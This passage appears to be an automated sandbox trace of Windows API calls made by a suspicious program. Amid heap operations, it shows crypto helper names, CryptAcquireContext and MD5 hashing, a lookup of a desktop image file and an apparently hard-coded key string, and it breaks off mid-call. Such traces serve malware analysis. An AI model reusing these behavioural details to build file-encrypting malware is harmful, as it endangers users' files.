hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0120.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0120.176] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0120.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0120.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0120.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0120.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0120.176] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0120.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0120.176] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0120.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0120.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0120.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0120.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0120.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0120.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0120.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0120.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0120.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0120.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0120.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0120.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0120.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0120.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0120.177] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0120.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0120.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0120.178] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0120.178] CloseHandle (hObject=0x258) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0120.178] FreeLibrary (hLibModule=0x772d0000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0120.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0120.179] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0120.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.179] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392618 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.181] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\A2BeonpxV2cn0bIC.png", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73b60650, ftCreationTime.dwHighDateTime=0x1d5e12b, ftLastAccessTime.dwLowDateTime=0xfe4a440, ftLastAccessTime.dwHighDateTime=0x1d5e2b8, ftLastWriteTime.dwLowDateTime=0xfe4a440, ftLastWriteTime.dwHighDateTime=0x1d5e2b8, nFileSizeHigh=0x0, nFileSizeLow=0x8ef9, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="A2BeonpxV2cn0bIC.png", cAlternateFileName="A2BEON~1.PNG")) returned 0x41ac500 [0120.181] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.181] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.181] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0120.181] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392228 | out: hHeap=0x1780000) returned 1 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0120.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.182] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0120.182] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.182] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0120.182] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.183] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0120.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0120.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0120.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0120.183] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.183] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0120.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797008, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0120.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0120.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fe8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0120.183] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0120.184] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0120.184] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0120.184] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0120.184] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0120.184] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.204] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0120.204] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.204] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0120.204] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0120.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0120.204] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0120.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 